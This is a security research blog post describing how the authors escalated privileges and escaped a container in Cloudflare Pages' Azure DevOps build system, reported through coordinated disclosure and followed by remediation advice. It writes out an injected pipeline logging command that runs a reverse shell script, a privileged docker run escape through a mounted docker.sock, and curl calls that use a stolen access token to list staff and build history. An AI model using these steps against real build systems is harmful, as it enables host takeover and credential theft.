Cloudflare Pages, part 2: The two privescs

May 6, 2022

Bart Simpson sliding down a staircase, before falling off the railing and hitting each stair on the way down. bart is labelled with the words 'cloudflare pages' and the steps are labeled with various security issues.
 

Introduction

Following on from our 1st story, we’ll be continuing the epic tale of our research into Cloudflare pages in this second installment. If you haven’t read part 1, you can read it here.

We pick up where we left off, after harvesting a bunch of secrets from the Cloudflare pages build system, and getting our reverse shell running as the AzDevOps+ user, which gave us root in the container.

OrangeRa1n Jailbreak

As we reported the previous vulnerabilities to Cloudflare, they systemically applied fixes to the code orchestrating the builds, which locked us back out. We had to find a new way back in each time. While we still had access though, we wanted to try and find further injection bugs. Having exhausted the low hanging fruit for escaping the buildbot user, we now wanted to get a root shell in the Cloudflare Pages CI hosts. You may remember us talking a big game about containers, privilege escalation, and container escape earlier in this post. In any CD system you are looking at, these can often lead to some really good findings if you can achieve them - this is because the container is often improperly treated as a security boundary by application developers. In the case of Cloudflare pages, this was the case.

In the previous post in thise series, we talked about the buildbot user, and the AzDevOps+ user, and the fact that our build scripts were running in the context of this user as part of the build process, potentially inside a container. The previous two findings were all performed in the context of this buildbot user, and eventually AzDevOps+ - which gave us root in the container, but we wanted to try a little harder and see if we could execute code as root on the host, and then potentially escape the container. First let’s look for some other ways we can get back into the AzDevOps+ user, should we get locked out - given we currently have access and the build tooling source code.

Referring again to the screenshot from the first set of findings, of the process tree -

a screenshot of a process tree from within a reverse shell, showing our process is running as the AzDevOps+ user we mentioned previously

You can see here that we have processes in the tree running as root, and as AzDevops+. Interestingly, this process tree tells us quite a lot about the execution environment

  • The node process running as root, has a PID of 1. Normally, PID 1 is the initialisation system under Linux (either SysV init or systemd), and the fact that PID 1 is showing as node is a strong indicator that we are in fact running inside a container, and this node process is our container entrypoint.
  • The build script is running as buildbot, but further up the process tree, we can see the sudo to the buildbot user, running as root. Given the parent process of sudo is running as AzureDevOps - this tells us that the AzureDevOps user has root access via sudo.
  • The fact that the sudo is happening as part of a bash script strongly suggests that AzureDevOps has passwordless sudo. When automating sudo calls, entering a password into sudo programmatically via a script requires good secrets management, and significant extra engineering effort - mostly, folks do not bother with this and just grant passwordless sudo to the user running the automation (or build script, in our case).
  • We can see that there are a mixture of node processes and bash scripts running from the __w directory, but also from /opt/pages. The /opt/pages folder strongly suggests this part of the process tree is part of the pages build, and we can potentially influence it with our build.

Given the above factors, compromising the integrity of any of the scripts in the process tree prior to the sudo have a high chance of giving us passwordless root, inside a container. And having root in a container gives us a strong chance of escaping the container. With that in mind, we dug into the scripts in question.

We focused first on the page build script, /opt/pages/build_tool/build.sh. Sadly, this looked fairly simple and didn’t present a lot of opportunity for command injection. We moved further up the process tree.

Looking at the .js scripts in the __w directory, it became apparent pretty quickly that these were part of the Microsoft Azure DevOps Pipelines agent. We’d like to quickly take a moment to thank Microsoft for their transparency and recent commitment to Open Source - because the entire build agent was available to us on GitHub.

Reading the documentation for Pipelines, you are very quickly introduced to the format and purpose of the .azure-pipelines.yml file. The Azure DevOps Pipelines agent operates on a .yaml configuration file, which we briefly mentioned earlier in this post. Essentially, it is a workflow file and details the steps which will be executed by the agent inside of an Azure VM when the pipeline is executed in Azure DevOps. We didn’t actually have to dig too deep into the agent code to work out how this all works due to the extensive documentation.

Reading over the documentation, looking for ways we might be able to run our own code under the Pipelines agent, Sean noticed this documentation section on Azure DevOps Pipelines variables, specifically that that can be interpolated inside the YAML. Normally, you would assume that if Cloudflare pages was generating an Azure DevOps Pipeline file to run our builds, they would be sanitising variables for the interpolation patterns detailed in the document.

To test this assumption, which is a key part of finding good bugs - we tried to insert some interpolated Azure DevOps Pipeline variables into our build settings, to see if we could use them to interpolate strings we controlled into the build steps we should not be able to control. Keeping In mind the commands in the Pipeline configuration would be running as the AzureDevOps user, which we strongly suspect has passwordless sudo, we went looking for a useful variable to set.

We found the below command which uses the account_env variable to generate the command used to run the build script. If we can control account_env, we can likely run an arbitrary command before the sudo happens, as $() substitutions happen prior to execution of a command in bash, in a subshell, which runs in the context of the user running the command. In our case, the contents of account_env would be evaluated (and executed!) as the AzureDevops user prior to the sudo to buildbot, which is exactly the outcome we want.

a screenshot of the post-status-update part of the build tooling pipeline used by azure devops, where $(account_env) is present in the commandline

With this target input in mind, we added the following to the “build command” in our Cloudflare pages project -

echo ok shell please
echo '##vso[task.setvariable variable=account_env];bash /tmp/shell.sh;echo '

This would tell Azure DevOps Pipelines (hopefully) to set the account_env variable in the Pipelines configuration to the string ‘;bash /tmp/shell.sh; echo’. /tmp/shell.sh is unsurprisingly, a reverse shell - and is part of our Git repository. If the variable injection works, and we can inject this command, the reverse shell should be checked out in time for the evaluation of $(account_env) to happen, which would trigger our reverse shell as the AzureDevOps user.

Running the job, we receive - a screenshot of a reverse shell session, with the whois command showing the user as AzDevOps_azpcontainer

…a shell, as AzureDevops_azpcontainer - the full, non-truncated username running the Pipelines again. The username also strongly supports the fact that we are in a container, as well as the UUID hostname, which is commonly seen with Docker containers. We’ve now got a second way back to this user, and another report to file.

Now that we’ve got a few ways in, it’s time to really break out the privilege escalation and go for a full container escape. Firstly, in our new context, we poke around the filesystem. One of the easiest ways to break out of containers (and a bit of a cardinal sin) is if the Docker socket is bind-mounted or accessible via TCP without TLS from inside the container. As luck would have it, there was indeed a /var/run/docker.sock present in the environment. It was owned by root. Testing our theory that the root in the container we could access via sudo would still be able to access the socket, despite the user namespace remapping which occurs by default with docker, meaning the UID of root in the container maps to an ineffective user ID in the host kernel. Naturally, we attempted to check what was at the other end of the docker socket.

a screenshot of the reverse shell after running sudo to gain root access in the container, and installing the docker package

So, we installed docker inside our container. Executing mount showed the presence of overlayfs and a series of bind mounts for files like /etc/resolv.conf, confirming we are indeed inside of a docker container, so an escape would be worthwhile if we could pull it off.

Let’s break out!

At this point, we had docker installed, and root access inside the container. The container escape with this access is actually really easy. We knew at this point we were trapped inside -

  • A process namespace, which would be limiting the processes and environment variables we could see
  • A network namespace, limiting what kind of networks we had access to
  • A user namespace, meaning our root account wasn’t the “real” root user on the host
  • And other, less problematic namespaces and cgroups

We simply ran the below command, to create a “super privileged container” -

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Let’s dig into those arguments a little -

  • -ti attaches a PTY and runs the command interactively, given us an interactive shell
  • --net=host disabled network namespace creation. This means our network namespace is the “root” or host network namespace, we are not confined in this regard. We can access all network interfaces, firewall rules (iptables) and network sockets on the host.
  • --uts=host disabled UTS namespace creation. This means our hostname information will be the same as the actual host. Not essential, but cool to demonstrate impact.
  • --ipc=host disabled IPC namespace creation. We have full access to host IPC.
  • --pid=host disabled process namespace creation. This means our PID namespace is the “root” or host namespace, we can see all processes.
  • -v /:/rootfs mounts the host server’s filesystem inside the directory /rootfs inside our container. Whilst this doesn’t disable the mount namespace (we still have our own filesystem for the container) it does allow access to all files on the host.
  • --privileged is going to be very useful for us in proving impact on this issue, as it allows us to operate inside the same user namespace as the actual server (our root account is the “real” root account) and also allows full access to the host’s /proc filesystem

Boom.

a screenshot showing the above docker command being run and the result being a root shell on the host machine with access to the host filesystem, showing the hostname of the host system

Googling, we realised that these were in fact tokens which the instance used for authenticating with Azure Devops itself. Interesting! Similar to instance AWS tokens obtainable via the cloud instance metadata APIs. Using these we could say a friendly Windows Hello to Cloudflare’s Azure Devops Organisation.

curl https://[email protected]/cloudflarepages/_apis/teams?api-version=6.0-preview.3 -H "Authorization: Bearer $SECRET_SYSTEM_ACCESSTOKEN" | jq`
curl https://[email protected]/cloudflarepages/_apis/projects/<uuid>/teams/<uuid>/members?api-version=6.0 -H "Authorization: Bearer $SECRET_SYSTEM_ACCESSTOKEN" | jq

With this, we were able to list all of Cloudflare’s users within this project:

a screenshot of the API call response for listing the users in the Cloudflare org we had access to, via the API, showing a list of Cloudflare employees who has access to Cloudflare's org used for pages

We were also be able to access all Cloudflare pages build history for all users on Cloudflare pages -

curl https://[email protected]/cloudflarepages/Pages/_apis/pipelines/2/runs?api-version=6.0-preview.1 -H "Authorization: Bearer $SECRET_SYSTEM_ACCESSTOKEN" | jq

a screenshot showing the build history in DevOps pipelines for the cloudflare pages project, including our builds

Conclusion

We had achieved our goal of stealing Github and Cloudflare tokens from the platform, but we had also managed privilege escalation to root in the container, escaping the confinement of the container we were in to get a root shell on the host, and ultimately getting access to the Azure Devops Organisation for Cloudflare.

In remediating this issue, there’s multiple points of defense in depth that could be utilized to prevent this from occurring:

  • The initial vector was caused by a subtle feature of Azure Devops Pipelines. As recommended only in the security section of their documentation, they suggest adding a restriction on logging commands to prevent this kind of exposure (https://docs.microsoft.com/en-us/azure/devops/pipelines/security/templates?view=azure-devops#agent-logging-command-restrictions); We point to Felix Wilhelm’s work at Google Project Zero that similarly addressed these concerns https://bugs.chromium.org/p/project-zero/issues/detail?id=2070&can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&cells=ids
  • Providing passwordless sudo as the azure devops user resulted in us being able to privilege escalate to root within the container. Creating a password or heavily restricting the permissions of passwordless sudo to only specific necessary binaries may have mitigated this risk partially
  • Mounting the docker.sock socket into the container allowed us to escape out of the container. By not mounting this file at all, or restricting permissions to read and write from this socket file may have mitigated this risk if we weren’t able to escalate to root.
  • Limiting possible syscalls using technologies like SELinux, AppArmor, or emulating syscalls using technology such as gVisor prevent the use of inappropriate syscalls which indicate compromise. In our case, our builds had no business calling syscalls such as mount, chroot, clone - but here we were spawning containers and mounting filesystems.
  • Directly executing the commands with interpolated variables with a high privilege user resulted in this vulnerability, so sanitizing the environment variables and dropping privileges before executing the operation would have also prevented this risk.

At this point, we submitted all our bugs to Cloudflare, and they very quickly triaged and began attempting to remediate the issues. We asked to disclose initially, however very reasonably their response was to request we stop testing until they had mitigated the vulnerabilities.

Part 3

After assessing their options, Cloudflare decided to pursue different architectures for Cloudflare Pages not based on Azure Pipelines. They also requested that we not disclose until they had finished their rearchitecture. It’s not every day you get to say you hacked a platform to the point where it had to be totally rearchitected - but here we are. You might think that would have been enough, but join us in The return of the secrets: part 3 for the final part of our research, where we look at the re-architected platform. Or, head back to part 1.